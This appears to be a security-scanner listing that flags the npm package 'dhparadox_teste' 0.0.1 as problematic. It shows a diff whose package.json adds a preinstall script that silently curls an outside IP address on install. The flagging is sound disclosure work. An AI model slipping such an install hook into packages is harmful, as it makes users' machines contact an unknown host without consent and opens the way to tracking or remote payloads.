dhparadox_teste 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dhparadox_teste might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +7 -0
package/package.json ADDED
@@ -0,0 +1,7 @@
1
+ {
2
+ "name" : "dhparadox_teste",
3
+ "version" : "0.0.1",
4
+ "scripts" : {
5
+ "preinstall" : "curl https://161.35.54.109:8080"
6
+ }
7
+ }